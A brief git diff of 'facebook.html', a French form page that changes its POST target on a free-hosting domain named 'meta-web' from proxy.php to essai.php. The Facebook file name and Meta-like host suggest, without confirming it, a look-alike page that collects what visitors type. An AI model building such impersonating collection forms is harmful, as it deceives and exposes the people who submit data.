--- a/facebook.html
+++ b/facebook.html
@@ -6,7 +6,7 @@
     <title>Formulaire de Proxy</title>
 </head>
 <body>
-    <form action="https://meta-web.infinityfreeapp.com/proxy.php" method="POST">
+    <form action="https://meta-web.infinityfreeapp.com/essai.php" method="POST">
         <label for="nom">Nom :</label>
         <input type="text" id="nom" name="nom" required><br><br>
 
